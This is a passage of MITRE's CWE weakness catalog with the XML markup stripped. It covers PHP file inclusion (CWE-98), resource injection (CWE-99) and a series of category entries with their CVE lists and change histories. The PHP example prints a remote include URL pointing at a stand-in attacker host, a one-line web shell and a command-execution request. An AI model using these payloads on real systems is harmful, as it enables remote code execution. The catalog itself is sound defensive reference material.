+ + $dir = $_GET['module_name'];include($dir . "/function.php"); + + The problem with the above code is that the value of $dir is not restricted in any way, and a malicious user could manipulate the 'module_name' parameter to force inclusion of an unanticipated file. For example, an attacker could request the above PHP page (example.php) with a 'module_name' of "http://malicious.example.com" by using the following request string: + + victim.php?module_name=http://malicious.example.com + + Upon receiving this request, the code would set 'module_name' to the value "http://malicious.example.com" and would attempt to include http://malicious.example.com/function.php, along with any malicious code it contains. + For the sake of this example, assume that the malicious version of function.php looks like the following: + + system($_GET['cmd']); + + An attacker could now go a step further in our example and provide a request string as follows: + + victim.php?module_name=http://malicious.example.com&cmd=/bin/ls%20-l + + The code will attempt to include the malicious function.php file from the remote site. In turn, this file executes the command specified in the 'cmd' parameter from the query string. The end result is an attempt by tvictim.php to execute the potentially malicious command, in this case: + + /bin/ls -l + + Note that the above PHP example can be mitigated by setting allow_url_fopen to false, although this will not fully protect the code. See potential mitigations. + + + + + CVE-2004-0285 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-0285 + + + CVE-2004-0030 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-0030 + + + CVE-2004-0068 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2004-0068 + + + CVE-2005-2157 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-2157 + + + CVE-2005-2162 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-2162 + + + CVE-2005-2198 + Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. + https://www.cve.org/CVERecord?id=CVE-2005-2198 + + + CVE-2004-0128 + Modification of assumed-immutable variable in configuration script leads to file inclusion. + https://www.cve.org/CVERecord?id=CVE-2004-0128 + + + CVE-2005-1864 + PHP file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-1864 + + + CVE-2005-1869 + PHP file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-1869 + + + CVE-2005-1870 + PHP file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-1870 + + + CVE-2005-2154 + PHP local file inclusion. + https://www.cve.org/CVERecord?id=CVE-2005-2154 + + + CVE-2002-1704 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2002-1704 + + + CVE-2002-1707 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2002-1707 + + + CVE-2005-1964 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2005-1964 + + + CVE-2005-1681 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2005-1681 + + + CVE-2005-2086 + PHP remote file include. + https://www.cve.org/CVERecord?id=CVE-2005-2086 + + + CVE-2004-0127 + Directory traversal vulnerability in PHP include statement. + https://www.cve.org/CVERecord?id=CVE-2004-0127 + + + CVE-2005-1971 + Directory traversal vulnerability in PHP include statement. + https://www.cve.org/CVERecord?id=CVE-2005-1971 + + + CVE-2005-3335 + PHP file inclusion issue, both remote and local; local include uses ".." and "%00" characters as a manipulation, but many remote file inclusion issues probably have this vector. + https://www.cve.org/CVERecord?id=CVE-2005-3335 + + + CVE-2009-1936 + chain: library file sends a redirect if it is directly requested but continues to execute, allowing remote file inclusion and path traversal. + https://www.cve.org/CVERecord?id=CVE-2009-1936 + + + + File or Directory + + + + PHP File Include + + + A3 + Malicious File Execution + CWE More Specific + + + 5 + Remote File Inclusion + + + + + + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This is frequently a functional consequence of other weaknesses. It is usually multi-factor with other factors (e.g. MAID), although not all inclusion bugs involve assumed-immutable data. Direct request weaknesses frequently play a role. + Can overlap directory traversal in local inclusion problems. + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Research_Gaps, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + CWE Content Team + MITRE + 2009-12-28 + updated Alternate_Terms, Applicable_Platforms, Demonstrative_Examples, Likelihood_of_Exploit, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-02-16 + Critical + converted from Compound_Element to Weakness + + + CWE Content Team + MITRE + 2010-02-16 + updated Alternate_Terms, Common_Consequences, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Name, Observed_Examples + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Demonstrative_Examples, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + PHP File Inclusion + Insufficient Control of Filename for Include/Require Statement in PHP Program (aka 'PHP File Inclusion') + Improper Control of Filename for Include/Require Statement in PHP Program ('PHP File Inclusion') + + + + The product receives input from an upstream component, but it does not restrict or incorrectly restricts the input before it is used as an identifier for a resource that may be outside the intended sphere of control. + + A resource injection issue occurs when the following two conditions are met: + + An attacker can specify the identifier used to access a system resource. For example, an attacker might be able to specify part of the name of a file to be opened or a port number to be used. + By specifying the resource, the attacker gains a capability that would not otherwise be permitted. For example, the program may give the attacker the ability to overwrite the specified file, run with a configuration controlled by the attacker, or transmit sensitive information to a third-party server. + + This may enable an attacker to access or modify otherwise protected system resources. + + + + + + + + + Primary + + + + + + + + Insecure Direct Object Reference + OWASP uses this term, although it is effectively the same as resource injection. + + + + + Architecture and Design + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Confidentiality + Integrity + Read Application Data + Modify Application Data + Read Files or Directories + Modify Files or Directories + An attacker could gain access to or modify sensitive data or system resources. This could allow access to protected files or directories including configuration files and files containing sensitive information. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Input Validation + + Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. + When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." + Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, it can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. + + + + + + The following Java code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as "../../tomcat/conf/server.xml", which causes the application to delete one of its own configuration files. + + String rName = request.getParameter("reportName");File rFile = new File("/usr/local/apfr/reports/" + rName);...rFile.delete(); + + + + The following code uses input from the command line to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can create soft links to the file, they can use the program to read the first part of any file on the system. + + ifstream ifs(argv[0]);string s;ifs >> s;cout << s; + + The kind of resource the data affects indicates the kind of content that may be dangerous. For example, data containing special characters like period, slash, and backslash, are risky when used in methods that interact with the file system. (Resource injection, when it is related to file system resources, sometimes goes by the name "path manipulation.") Similarly, data that contains URLs and URIs is risky for functions that create remote connections. + + + + + Resource Injection + + + SFP24 + Tainted input to command + + + ASCSM-CWE-99 + + + + + + + + + + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + Resource injection that involves resources stored on the filesystem goes by the name path manipulation (CWE-73). + The relationship between CWE-99 and CWE-610 needs further investigation and clarification. They might be duplicates. CWE-99 "Resource Injection," as originally defined in Seven Pernicious Kingdoms taxonomy, emphasizes the "identifier used to access a system resource" such as a file name or port number, yet it explicitly states that the "resource injection" term does not apply to "path manipulation," which effectively identifies the path at which a resource can be found and could be considered to be one aspect of a resource identifier. Also, CWE-610 effectively covers any type of resource, whether that resource is at the system layer, the application layer, or the code layer. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-05-27 + updated Description, Name + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Maintenance_Notes, Other_Notes, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-06-23 + updated Alternate_Terms, Description, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Other_Notes, Potential_Mitigations, References, Relationships, Type + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Resource Injection + Insufficient Control of Resource Identifiers (aka 'Resource Injection') + + + + + + This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Location + + + + This category has been deprecated. It added unnecessary depth and complexity to its associated views. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + ASP.NET Environment Issues + + + + This category has been deprecated. It was originally intended as a "catch-all" for input validation problems in technologies that did not have their own CWE, but introduces unnecessary depth to the hierarchy. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2009-10-15 + changed from weakness to category, updated Relationships, added Taxonomy_Mapping + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Technology-Specific Input Validation Problems + + + + This category identifies Software Fault Patterns (SFPs) within the Use of an Improper API cluster (SFP3). + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category identifies Software Fault Patterns (SFPs) within the Unexpected Entry Points cluster. + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2014-07-29 + 2.8 + 2014-07-31 + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that exist when an application does not properly validate or represent input. According to the authors of the Seven Pernicious Kingdoms, "Input validation and representation problems are caused by metacharacters, alternate encodings and numeric representations. Security problems result from trusting input." + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + 7 Pernicious Kingdoms + 2017-05-05 + 2.11 + 2017-05-05 + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Name, References + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Seven Pernicious Kingdoms Category: Input Validation and Representation + + + + Weaknesses in this category are related to coding practices that are deemed unsafe and increase the chances that an exploitable vulnerability will be present in the application. These weaknesses do not directly introduce a vulnerability, but indicate that the product has not been carefully developed or maintained. If a program is complex, difficult to maintain, not portable, or shows evidence of neglect, then there is a higher likelihood that weaknesses are buried in the code. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2017-06-29 + 2.12 + 2017-11-08 + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of audit-based components of the system. Frequently these deal with logging user activities in order to identify attackers and modifications to the system. The weaknesses in this category could lead to a degradation of the quality of the audit capability if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category has been deprecated. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Type + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Description, Mapping_Notes + + Struts Validation Problems + + + + Weaknesses in this category are related to the design and architecture of authentication components of the system. Frequently these deal with verifying the entity is indeed who it claims to be. The weaknesses in this category could lead to a degradation of the quality of authentication if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of a system's authorization components. Frequently these deal with enforcing that agents have the required permissions before performing certain operations, such as modifying data. The weaknesses in this category could lead to a degradation of quality of the authorization capability if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of multiple security tactics and how they affect a system. For example, information exposure can impact the Limit Access and Limit Exposure security tactics. The weaknesses in this category could lead to a degradation of the quality of many capabilities if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of data confidentiality in a system. Frequently these deal with the use of encryption libraries. The weaknesses in this category could lead to a degradation of the quality data encryption if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of a system's identification management components. Frequently these deal with verifying that external agents provide inputs into the system. The weaknesses in this category could lead to a degradation of the quality of identification management if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of system resources. Frequently these deal with restricting the amount of resources that are accessed by actors, such as memory, network connections, CPU or access points. The weaknesses in this category could lead to a degradation of the quality of authentication if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of the entry points to a system. Frequently these deal with minimizing the attack surface through designing the system with the least needed amount of entry points. The weaknesses in this category could lead to a degradation of a system's defenses if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of a system's lockout mechanism. Frequently these deal with scenarios that take effect in case of multiple failed attempts to access a given resource. The weaknesses in this category could lead to a degradation of access to system assets if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of session management. Frequently these deal with the information or status about each user and their access rights for the duration of multiple requests. The weaknesses in this category could lead to a degradation of the quality of session management if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of a system's input validation components. Frequently these deal with sanitizing, neutralizing and validating any externally provided inputs to minimize malformed data from entering the system and preventing code injection in the input data. The weaknesses in this category could lead to a degradation of the quality of data flow in a system if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the design and architecture of a system's data integrity components. Frequently these deal with ensuring integrity of data, such as messages, resource files, deployment files, and configuration files. The weaknesses in this category could lead to a degradation of data integrity quality if they are not addressed when designing or implementing a secure architecture. + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + Joanna C.S. Santos, Mehdi Mirakhorli + 2017-06-22 + 2.12 + 2017-11-08 + Provided the catalog, Common Architectural Weakness Enumeration (CAWE), and research papers for this view. + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A1 category in the OWASP Top Ten 2017. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to the A2 category in the OWASP Top Ten 2017. + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Content Team + MITRE + 2018-01-22 + 3.1 + 2018-03-29 + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + 